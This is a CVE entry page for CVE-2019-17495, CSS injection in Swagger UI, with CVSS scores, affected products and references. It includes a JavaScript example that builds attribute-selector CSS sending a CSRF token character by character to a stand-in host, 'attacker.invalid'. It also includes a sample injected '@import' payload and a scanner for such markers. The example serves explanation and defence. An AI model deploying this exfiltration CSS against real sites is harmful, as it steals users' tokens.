Free and open-source vulnerability scanner
Mageni eases for you the vulnerability scanning, assessment, and management process. It is free and open-source.
CVE-2019-17495
CVE information
Published
Last Modified
CVSSv2.0 Severity
CVSSv3.1 Severity
Impact Analysis
Description
A Cascading Style Sheets (CSS) injection vulnerability in Swagger UI before 3.23.11 allows attackers to use the Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration, such as exfiltration of a CSRF token value. In other words, this product intentionally allows the embedding of untrusted JSON data from remote servers, but it was not previously known that <style>@import within the JSON data was a functional attack method.
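The description above states the attack only at a high level. The following added example (not code from the Swagger UI project, from the referenced write-up, or from this page) does two things: it simulates the per-character CSS attribute-selector exfiltration that an injected `<style>@import` makes possible, and it scans an OpenAPI document for the injection markers before the document is handed to a Swagger UI instance. The field name `csrf`, the callback host `attacker.invalid`, the hex alphabet, the sample spec and all function names are constructed assumptions; the RPO step that makes the JSON load as a stylesheet is not reproduced here.

```javascript
// Added example for CVE-2019-17495; not code from Swagger UI or from this page.
// Part 1 simulates CSS attribute-selector exfiltration of an input value.
// Part 2 scans an OpenAPI document for the <style>/@import markers.
// Field name, callback host, alphabet, sample spec and helper names are
// constructed assumptions.

const ALPHABET = "0123456789abcdef"; // assumption: the token is lowercase hex

// One round of exfiltration CSS. A rule matches only when the target input's
// value starts with knownPrefix + c; a matching rule makes the browser fetch
// its background URL, which carries the guessed prefix to the attacker.
function buildExfilCss(fieldName, knownPrefix, callbackBase, alphabet = ALPHABET) {
  return Array.from(alphabet, (c) => {
    const guess = encodeURIComponent(knownPrefix + c);
    return `input[name="${fieldName}"][value^="${knownPrefix}${c}"]` +
      `{background:url(${callbackBase}/leak?v=${guess})}`;
  }).join("\n");
}

// Victim side, simulated: apply the stylesheet to a DOM whose input holds
// actualValue and return the URLs the browser would request.
function simulateBrowser(actualValue, css, fieldName) {
  const rule = new RegExp(
    `input\\[name="${fieldName}"\\]\\[value\\^="([^"]*)"\\]\\{background:url\\(([^)]*)\\)\\}`,
    "g",
  );
  const requested = [];
  for (const m of css.matchAll(rule)) {
    if (actualValue.startsWith(m[1])) requested.push(m[2]);
  }
  return requested;
}

// Attacker side: extend the known prefix one character per round until no
// rule matches (value fully recovered, or next char is outside the alphabet).
function recoverValue(actualValue, fieldName, callbackBase, alphabet = ALPHABET) {
  let prefix = "";
  for (;;) {
    const css = buildExfilCss(fieldName, prefix, callbackBase, alphabet);
    const hits = simulateBrowser(actualValue, css, fieldName);
    if (hits.length !== 1) break;
    prefix = new URL(hits[0]).searchParams.get("v"); // already URL-decoded
  }
  return prefix;
}

// Defensive check: flag string values in a spec that carry CSS injection
// markers. A hit is a review trigger, not proof of an attack.
const CSS_MARKERS = [/<style\b/i, /@import\b/i, /url\s*\(/i];

function findCssInjection(node, path = "$", hits = []) {
  if (typeof node === "string") {
    if (CSS_MARKERS.some((re) => re.test(node))) hits.push(path);
  } else if (Array.isArray(node)) {
    node.forEach((v, i) => findCssInjection(v, `${path}[${i}]`, hits));
  } else if (node !== null && typeof node === "object") {
    for (const [k, v] of Object.entries(node)) findCssInjection(v, `${path}.${k}`, hits);
  }
  return hits;
}

// Constructed sample: one operation description carries the injection.
const SAMPLE_SPEC = {
  openapi: "3.0.0",
  info: { title: "Pet store", description: "Plain text, nothing to see" },
  paths: {
    "/pets": {
      get: {
        description: "<style>@import url(//attacker.invalid/x.css)</style>",
        responses: { 200: { description: "ok" } },
      },
    },
  },
};

console.log(recoverValue("deadbeef", "csrf", "https://attacker.invalid"));
console.log(findCssInjection(SAMPLE_SPEC));
```

Each round of `buildExfilCss` needs a fresh stylesheet fetch in a real browser, which is why the published technique chains `@import` rules rather than injecting one static style block; the simulation collapses that into a loop. The scanner is deliberately broad: a legitimate description can contain `url(`, so treat a hit as a reason to inspect the spec or to refuse loading it into a Swagger UI older than 3.23.11, and treat the version upgrade, not the scanner, as the fix.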
CVSSv2.0 Score
- Severity: High
- Base Score: 7.5/10
- Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
- Exploitability subscore: 10.0
- Impact subscore: 6.4
- Access Vector: Network
- Access Complexity: Low
- Authentication Required: None
- Confidentiality Impact: Partial
- Integrity Impact: Partial
- Availability Impact: Partial
CVSSv3.1 Score
- Severity: Critical
- Base Score: 9.8/10
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Exploitability subscore: 3.9
- Impact subscore: 5.9
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
Products Affected
CPE | Affected | Vulnerable | Excluding
---|---|---|---
cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* | Yes | - | 3.23.11
cpe:2.3:a:oracle:utilities_framework:4.3.0.6.0:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:banking_digital_experience:*:*:*:*:*:*:*:* | Yes | 18.1 | -
cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:banking_digital_experience:21.1:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:banking_apis:*:*:*:*:*:*:*:* | Yes | 18.1 | -
cpe:2.3:a:oracle:banking_apis:19.1:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:banking_apis:19.2:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:banking_apis:20.1:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:banking_apis:21.1:*:*:*:*:*:*:* | Yes | - | -
cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* | Yes | 2.4.0 | -
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* | Yes | 16.2.0 | -
cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* | Yes | 17.12.0 | -

For the Swagger UI entry, Excluding gives the first fixed release (3.23.11, matching the description). For the wildcard Oracle entries, Vulnerable gives only the first affected version of the range that bundles the vulnerable Swagger UI; the upper bound of each range is not recorded here, so check the Oracle Critical Patch Update advisories listed under References for the exact affected and fixed versions.
References
- https://github.com/tarantula-team/CSS-injection-in-Swagger-UI
- https://github.com/swagger-api/swagger-ui/releases/tag/v3.23.11
- https://www.oracle.com/security-alerts/cpuoct2020.html
- https://www.oracle.com/security-alerts/cpuApr2021.html
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://lists.apache.org/thread.html/r3acb7e494cf1aab99b6784b7c5bbddfd0d4f8a484ab534c3a6
- https://lists.apache.org/thread.html/r103579b01da2d0aa0f672b88f811224bbf8ef493aaad845895
- https://lists.apache.org/thread.html/ref70b940c4f69560d29d6ba792d6c82865e74de3dcad4c92d9
- https://lists.apache.org/thread.html/r853ffeb915a400f899de78124d4e0d77a19379d2e11bf8f4e9
- https://lists.apache.org/thread.html/r84b327f7a8b6b28857b906c07a66dd98e1d341191fa8d78165